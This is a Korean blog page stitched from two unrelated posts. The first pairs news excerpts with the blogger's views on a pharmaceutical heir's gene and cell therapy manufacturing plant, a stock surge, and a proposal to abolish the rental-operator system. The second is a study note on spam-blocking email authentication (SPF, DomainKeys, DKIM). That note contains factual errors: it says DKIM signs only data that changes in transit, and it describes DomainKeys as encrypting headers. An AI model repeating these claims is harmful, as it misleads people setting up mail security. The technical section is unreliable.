하지만 오너 2세인 유용환 대표의 생각은 달랐다. 바이오업계의 연구개발(R&D) 트렌드를 감안하면 곧 유전자·세포 치료제 시장이 활짝 열릴 가능성이 높지만, 정작 생산 인프라를 갖추지 못한 바이오 벤처들이 임상시료 생산을 맡길 곳이 마땅치 않기 때문이었다. 유전자·세포 치료제 생산대행 수요가 클 것으로 확신한 유 대표는 전환사채(CB)를 발행해 마련한 돈과 헬릭스미스 지분 매각대금(1100억원) 등을 공장 건립에 쏟아붓는 '승부수'를 던졌다.

 

이틀 전 주식고수님께서 방문하셨습니다.

이 날 이연제약으로 수익을 내셨다고 말씀해주셨습니다. 그때 그래프를 보니, 30% 폭등을 했더라구요...ㄷㄷㄷ

그 후 오늘 신문에 나오길래 반가운 마음에서 가지고 와봤습니다.

 

 

 

부동산

 

 

더불어민주당이 민간 임대사업자제도의 완전 폐지를 유력하게 검토하는 것은 임대사업자의 매물이 시장에 나와야 부동산 가격이 안정화될 것이란 판단 때문이다. 민주당은 4.7 재,보궐선거 패배 후 부동산 정책 변경을 추진해왔다. 민주당 내에서는 재산세 감면 등과 함께 임대사업자에 대한 혜택 축소가 필요하다는 목소리가 공공연히 나왔다.

하지만 부동산 전문가들은 임대사업자 제도를 폐지하면 그 피해가 고스란히 세입자에게 돌아갈 것이라고 지적한다.

 

줬다 뺏기식입니다.

임대사업자를 등록을 하라고, 혜택을 주겠다고 해서 등록한 사람들이 많을텐데요. 그 혜택을 고스란히 없애겠다는 겁니다.

저도 위의 의견에 동의합니다. 그 피해는 오롯이 임차인들에게 전가될 것입니다.

결국 임대사업자 혜택 폐지는 국민들을 더 힘들게 만드는 꼴이네요.

 

 

 

 

 

오늘도 힘찬날 보내세요~

 

 

LIST
SMALL

스팸메일 차단 정책

1) SPF (Sender Policy Framework)

(가) 개요

1.메일서버등록제 (SPF)는 메일서버 정보를 사전에 해당 도메인 DNS에 공개 등록함으로써 수신자로 하여금 이메일에 표시된 발송자 정보가 실제 메일서버의 정보와 일치하는지를 확인할 수 있도록 하는 인증 기술이다.

2.대다수 스팸 발송자가 자신의 신원을 감추기 위하여 발송자 주소나 전송 경로를 허위로 표기하거나 변경하는 경우가 많다는 점에 착안

(나) 동작 방식

1.발신자 : 자신의 메일서버 정보와 정책을 나타내는 SPF 레코드를 해당 DNS의 TXT레코드에 등록한다.

2.수신자 : 이메일 수신시 발송자의 DNS에 등록된 SPF 레코드를 확인하여 해당 이메일에 표시된 발송 IP와 대조하고 그 결과값에 따라 수신여부를 결정한다.(메일서버나 스팸차단솔루션에 SPF 인증 기능이 설치되어 있어야 한다)

2)DomainKeys

1.yahoo 에서 처음 개발한 기술로 메일 헤더를 암호화하여 해시값을 생성한다.

2.해시값은 이메일 헤더에 기록된다

3.이메일을 받은 서버에서는 이를 검증하여 변조 유무를 확인한다.

3)DKIM(DomainKeys Identified Mail)

1.yahoo의 DomainKeys와 시스코의 IIM(Internet Identified Mail)이 결함된 기술이다.

2.DKIM은 공개키 암호기술에 의존한다.

3.발신 이메일에 디지털 서명을 포함하여 수신자는 송신자의 진위를 알 수 있다.

4.DomainKeys와 다르게 DKIM은 전송과정에서 변화하는 정보에 대해서만 디지털 서명작업을 수행한다.

LIST

+ Recent posts